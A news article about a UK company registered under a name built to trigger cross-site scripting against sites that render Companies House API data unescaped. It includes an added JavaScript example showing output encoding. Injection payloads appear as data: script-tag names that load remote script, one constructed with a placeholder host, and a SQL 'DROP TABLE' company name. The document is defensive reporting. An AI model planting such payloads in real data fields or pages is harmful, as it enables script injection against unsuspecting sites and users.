Companies House has blocked somebody who registered a new business under a name containing the right characters, in the right order, to trigger a cross-site scripting (XSS) attack against users of the service's API.
The company in question, registered number 12956509, was originally registered with the UK's official business registrar under the name:
" >< SCRIPT SRC[=] HTTPS[:]// MJT.XSS.HT > LTD.
The name as registered did not include the square brackets, meaning anybody reading company names from the Companies House API and rendering them without escaping could have ended up loading a script from the web address above.
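The defence the episode calls for is output encoding on the consumer's side. The following is an added example, not code from the article, from Companies House or from the person who registered the company; the company number and the script host are placeholders, and the name is constructed to carry the same shape of payload the article describes.

```javascript
// Added example: HTML-encode registry data before it lands in markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Constructed record (placeholder number and host, not the real ones).
const company = {
  company_number: '00000000',
  company_name: '"><SCRIPT SRC=HTTPS://EXAMPLE.INVALID> LTD',
};

// Vulnerable rendering: API data is concatenated straight into the page.
// The leading "> closes the attribute and element, and the rest becomes a live tag.
function renderUnsafe(c) {
  return `<input value="${c.company_name}"> <span>${c.company_name}</span>`;
}

// Hardened rendering: every untrusted field is encoded for the context it lands in.
function renderSafe(c) {
  const name = escapeHtml(c.company_name);
  return `<input value="${name}"> <span>${name}</span>`;
}

// Check used by the test: did the markup acquire a tag the template never wrote?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

module.exports = { escapeHtml, renderUnsafe, renderSafe, containsScriptTag, company };
```

The same encoder handles the ampersand and quotes in the other names the article mentions; what it does not do is validate the name, because a registrar that legitimately allows these characters is not the place to reject them.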
A person using the username michaeltandy on the Companies House developer forum later posted: "I had assumed I would not be the first person to utilize < and > (they are, after all, both clearly whitelisted as legal characters) and that 99 percent of systems would currently be escaping them ... I would simply get a company with a playful name that would elicit an understanding chuckle from the type of people we'd be working with!"
The poster continued: "Once it turned out there were non-trivial issues, and that fact became more commonly publicised, we can't expect every consumer of information to do a full XSS audit in just a couple of days."
Although whoever registered the company appears to have had non-hostile intentions (xss.ht is a domain owned by the XSS Hunter service, as described on its main site), the vulnerability it exposes is not unique.
Such tomfoolery has happened before, helped by a legal requirement that particular punctuation marks be available for companies to use in their names. Thus were born "; DROP TABLE "COMPANIES";-- LTD" and "SAFDASD & SFSAF ' SFDAASF " LTD", both of which exploited the availability of punctuation marks to put commands into the company name field.
Tech lawyer Neil Brown of decoded.legal told The Register: "This is symbolic (if one might excuse the pun) of a regime which thinks about individual characters in isolation, and not the effect of the combination of those characters." He explained that while section 53 of the Companies Act 2000 does stop people registering companies with "offensive" names, or names whose publication would be a criminal offence, it is unclear whether that suffices to stop people registering database commands as company names.
"Would using an XSS attack constitute an offence? Even with the state of the Computer Misuse Act 1990, that would be a stretch too far. Is it offensive? I do not think so, but then I'm not the Secretary of State," suggested Brown, who also pointed out yet another crappy company name.
As for lessons to be drawn from this, Brown wondered whether simply advising people to sanitise inputs from official systems was "too dull" for El Reg. We happen to agree, but it is also the sort of sensible advice somebody, somewhere, might actually benefit from. The BBC Bitesize guide to input sanitisation (don't laugh, we all started somewhere) can be found here.
A Companies House spokesperson told The Register: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on vulnerable external websites. We have taken immediate steps to mitigate this risk."
He added: "We are confident that Companies House services remain safe and secure."
And indeed Companies House is safe and secure: company number 12956509 is now called "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD". ®
Drop Table Companies Ltd (add the required punctuation marks at your leisure) was a practical joke by techie Sam Pizzey, who blogged about it at the time. He wrote: "The company name is a bit of hacker sleight-of-hand ... or as some astute people have put it, it's 'wrong'."
Several people also registered Openreach Ltd over the years until BT woke up and registered the company name itself.